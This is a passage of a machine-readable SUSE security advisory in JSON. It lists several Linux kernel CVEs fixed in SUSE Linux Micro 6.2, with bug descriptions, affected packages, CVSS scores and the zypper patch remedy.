"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68819",
"url": "https://www.suse.com/security/cve/CVE-2025-68819"
},
{
"category": "external",
"summary": "SUSE Bug 1256664 for CVE-2025-68819",
"url": "https://bugzilla.suse.com/1256664"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68820"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68820",
"url": "https://www.suse.com/security/cve/CVE-2025-68820"
},
{
"category": "external",
"summary": "SUSE Bug 1256754 for CVE-2025-68820",
"url": "https://bugzilla.suse.com/1256754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-68821",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68821"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix readahead reclaim deadlock\n\nCommit e26ee4efbc79 (\"fuse: allocate ff-\u003erelease_args only if release is\nneeded\") skips allocating ff-\u003erelease_args if the server does not\nimplement open. However in doing so, fuse_prepare_release() now skips\ngrabbing the reference on the inode, which makes it possible for an\ninode to be evicted from the dcache while there are inflight readahead\nrequests. This causes a deadlock if the server triggers reclaim while\nservicing the readahead request and reclaim attempts to evict the inode\nof the file being read ahead. Since the folio is locked during\nreadahead, when reclaim evicts the fuse inode and fuse_evict_inode()\nattempts to remove all folios associated with the inode from the page\ncache (truncate_inode_pages_range()), reclaim will block forever waiting\nfor the lock since readahead cannot relinquish the lock because it is\nitself blocked in reclaim:\n\n\u003e\u003e\u003e stack_trace(1504735)\n folio_wait_bit_common (mm/filemap.c:1308:4)\n folio_lock (./include/linux/pagemap.h:1052:3)\n truncate_inode_pages_range (mm/truncate.c:336:10)\n fuse_evict_inode (fs/fuse/inode.c:161:2)\n evict (fs/inode.c:704:3)\n dentry_unlink_inode (fs/dcache.c:412:3)\n __dentry_kill (fs/dcache.c:615:3)\n shrink_kill (fs/dcache.c:1060:12)\n shrink_dentry_list (fs/dcache.c:1087:3)\n prune_dcache_sb (fs/dcache.c:1168:2)\n super_cache_scan (fs/super.c:221:10)\n do_shrink_slab (mm/shrinker.c:435:9)\n shrink_slab (mm/shrinker.c:626:10)\n shrink_node (mm/vmscan.c:5951:2)\n shrink_zones (mm/vmscan.c:6195:3)\n do_try_to_free_pages (mm/vmscan.c:6257:3)\n do_swap_page (mm/memory.c:4136:11)\n handle_pte_fault (mm/memory.c:5562:10)\n handle_mm_fault (mm/memory.c:5870:9)\n do_user_addr_fault (arch/x86/mm/fault.c:1338:10)\n handle_page_fault (arch/x86/mm/fault.c:1481:3)\n exc_page_fault (arch/x86/mm/fault.c:1539:2)\n asm_exc_page_fault+0x22/0x27\n\nFix this deadlock by allocating ff-\u003erelease_args and grabbing the\nreference on the inode when preparing the file for release even if the\nserver does not implement open. The inode reference will be dropped when\nthe last reference on the fuse file is dropped (see fuse_file_put() -\u003e\nfuse_release_end()).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68821",
"url": "https://www.suse.com/security/cve/CVE-2025-68821"
},
{
"category": "external",
"summary": "SUSE Bug 1256667 for CVE-2025-68821",
"url": "https://bugzilla.suse.com/1256667"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
